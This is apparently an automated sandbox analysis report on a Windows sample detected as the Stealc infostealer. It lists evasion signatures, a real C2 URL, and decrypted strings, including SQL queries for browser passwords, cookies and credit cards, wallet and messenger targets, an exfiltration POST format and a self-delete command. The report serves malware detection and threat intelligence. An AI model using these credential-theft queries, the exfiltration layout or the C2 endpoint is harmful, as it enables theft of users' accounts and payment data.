Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546478
MD5: 43deae52c429449144c488c4ea074c14
SHA1: 2496e112cf08e1584a15d65409d84936f3c8b7f9
SHA256: bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.680000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.680000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.680000.0.unpack String decryptor: 30
Source: 0.2.file.exe.680000.0.unpack String decryptor: 11
Source: 0.2.file.exe.680000.0.unpack String decryptor: 20
Source: 0.2.file.exe.680000.0.unpack String decryptor: 24
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.680000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.680000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.680000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.680000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.680000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.680000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.680000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.680000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.680000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.680000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.680000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.680000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.680000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.680000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.680000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.680000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.680000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.680000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.680000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.680000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.680000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.680000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.680000.0.unpack String decryptor: http://185.215.113.206
Source: 0.2.file.exe.680000.0.unpack String decryptor: bksvnsj
Source: 0.2.file.exe.680000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.680000.0.unpack String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.680000.0.unpack String decryptor: tale
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.680000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.680000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.680000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.680000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.680000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.680000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.680000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.680000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.680000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.680000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.680000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.680000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.680000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.680000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.680000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.680000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.680000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.680000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.680000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.680000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.680000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.680000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.680000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.680000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.680000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.680000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.680000.0.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.680000.0.unpack String decryptor: GdipFree
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.680000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.680000.0.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.680000.0.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.680000.0.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.680000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetDC
Source: 0.2.file.exe.680000.0.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.680000.0.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.680000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.680000.0.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.680000.0.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.680000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.680000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.680000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.680000.0.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.680000.0.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.680000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.680000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.680000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.680000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.680000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.680000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.680000.0.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.680000.0.unpack String decryptor: StrStrA
Source: 0.2.file.exe.680000.0.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.680000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.680000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.680000.0.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.680000.0.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.680000.0.unpack String decryptor: RmGetList
Source: 0.2.file.exe.680000.0.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.680000.0.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.680000.0.unpack String decryptor: PATH
Source: 0.2.file.exe.680000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.680000.0.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.680000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.680000.0.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.680000.0.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.680000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.680000.0.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.680000.0.unpack String decryptor: browser:
Source: 0.2.file.exe.680000.0.unpack String decryptor: profile:
Source: 0.2.file.exe.680000.0.unpack String decryptor: url:
Source: 0.2.file.exe.680000.0.unpack String decryptor: login:
Source: 0.2.file.exe.680000.0.unpack String decryptor: password:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Opera
Source: 0.2.file.exe.680000.0.unpack String decryptor: OperaGX
Source: 0.2.file.exe.680000.0.unpack String decryptor: Network
Source: 0.2.file.exe.680000.0.unpack String decryptor: cookies
Source: 0.2.file.exe.680000.0.unpack String decryptor: .txt
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.680000.0.unpack String decryptor: TRUE
Source: 0.2.file.exe.680000.0.unpack String decryptor: FALSE
Source: 0.2.file.exe.680000.0.unpack String decryptor: autofill
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.680000.0.unpack String decryptor: history
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack String decryptor: cc
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.680000.0.unpack String decryptor: name:
Source: 0.2.file.exe.680000.0.unpack String decryptor: month:
Source: 0.2.file.exe.680000.0.unpack String decryptor: year:
Source: 0.2.file.exe.680000.0.unpack String decryptor: card:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Cookies
Source: 0.2.file.exe.680000.0.unpack String decryptor: Login Data
Source: 0.2.file.exe.680000.0.unpack String decryptor: Web Data
Source: 0.2.file.exe.680000.0.unpack String decryptor: History
Source: 0.2.file.exe.680000.0.unpack String decryptor: logins.json
Source: 0.2.file.exe.680000.0.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.680000.0.unpack String decryptor: usernameField
Source: 0.2.file.exe.680000.0.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.680000.0.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.680000.0.unpack String decryptor: guid
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.680000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.680000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.680000.0.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.680000.0.unpack String decryptor: plugins
Source: 0.2.file.exe.680000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.680000.0.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.680000.0.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.680000.0.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.680000.0.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.680000.0.unpack String decryptor: CURRENT
Source: 0.2.file.exe.680000.0.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.680000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.680000.0.unpack String decryptor: Local State
Source: 0.2.file.exe.680000.0.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.680000.0.unpack String decryptor: chrome
Source: 0.2.file.exe.680000.0.unpack String decryptor: opera
Source: 0.2.file.exe.680000.0.unpack String decryptor: firefox
Source: 0.2.file.exe.680000.0.unpack String decryptor: wallets
Source: 0.2.file.exe.680000.0.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.680000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.680000.0.unpack String decryptor: ProductName
Source: 0.2.file.exe.680000.0.unpack String decryptor: x32
Source: 0.2.file.exe.680000.0.unpack String decryptor: x64
Source: 0.2.file.exe.680000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.680000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.680000.0.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.680000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.680000.0.unpack String decryptor: DisplayName
Source: 0.2.file.exe.680000.0.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.680000.0.unpack String decryptor: Network Info:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.680000.0.unpack String decryptor: System Summary:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - HWID:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - OS:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - UserName:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - UTC:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Language:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - CPU:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Threads:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Cores:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - RAM:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.680000.0.unpack String decryptor: - GPU:
Source: 0.2.file.exe.680000.0.unpack String decryptor: User Agents:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.680000.0.unpack String decryptor: All Users:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Current User:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Process List:
Source: 0.2.file.exe.680000.0.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.680000.0.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Temp\
Source: 0.2.file.exe.680000.0.unpack String decryptor: .exe
Source: 0.2.file.exe.680000.0.unpack String decryptor: runas
Source: 0.2.file.exe.680000.0.unpack String decryptor: open
Source: 0.2.file.exe.680000.0.unpack String decryptor: /c start
Source: 0.2.file.exe.680000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.680000.0.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.680000.0.unpack String decryptor: *.lnk
Source: 0.2.file.exe.680000.0.unpack String decryptor: files
Source: 0.2.file.exe.680000.0.unpack String decryptor: \discord\
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.680000.0.unpack String decryptor: key_datas
Source: 0.2.file.exe.680000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.680000.0.unpack String decryptor: map*
Source: 0.2.file.exe.680000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.680000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.680000.0.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.680000.0.unpack String decryptor: Telegram
Source: 0.2.file.exe.680000.0.unpack String decryptor: Tox
Source: 0.2.file.exe.680000.0.unpack String decryptor: *.tox
Source: 0.2.file.exe.680000.0.unpack String decryptor: *.ini
Source: 0.2.file.exe.680000.0.unpack String decryptor: Password
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack String decryptor: 00000001
Source: 0.2.file.exe.680000.0.unpack String decryptor: 00000002
Source: 0.2.file.exe.680000.0.unpack String decryptor: 00000003
Source: 0.2.file.exe.680000.0.unpack String decryptor: 00000004
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.680000.0.unpack String decryptor: Pidgin
Source: 0.2.file.exe.680000.0.unpack String decryptor: \.purple\
Source: 0.2.file.exe.680000.0.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.680000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.680000.0.unpack String decryptor: token:
Source: 0.2.file.exe.680000.0.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.680000.0.unpack String decryptor: SteamPath
Source: 0.2.file.exe.680000.0.unpack String decryptor: \config\
Source: 0.2.file.exe.680000.0.unpack String decryptor: ssfn*
Source: 0.2.file.exe.680000.0.unpack String decryptor: config.vdf
Source: 0.2.file.exe.680000.0.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.680000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.680000.0.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.680000.0.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Steam\
Source: 0.2.file.exe.680000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.680000.0.unpack String decryptor: browsers
Source: 0.2.file.exe.680000.0.unpack String decryptor: done
Source: 0.2.file.exe.680000.0.unpack String decryptor: soft
Source: 0.2.file.exe.680000.0.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.680000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.680000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.680000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.680000.0.unpack String decryptor: https
Source: 0.2.file.exe.680000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.680000.0.unpack String decryptor: POST
Source: 0.2.file.exe.680000.0.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.680000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.680000.0.unpack String decryptor: hwid
Source: 0.2.file.exe.680000.0.unpack String decryptor: build
Source: 0.2.file.exe.680000.0.unpack String decryptor: token
Source: 0.2.file.exe.680000.0.unpack String decryptor: file_name
Source: 0.2.file.exe.680000.0.unpack String decryptor: file
Source: 0.2.file.exe.680000.0.unpack String decryptor: message
Source: 0.2.file.exe.680000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.680000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00699030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_0068A210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_006872A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068A2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_0068A2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_0068C920
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_006940F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0068E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00681710
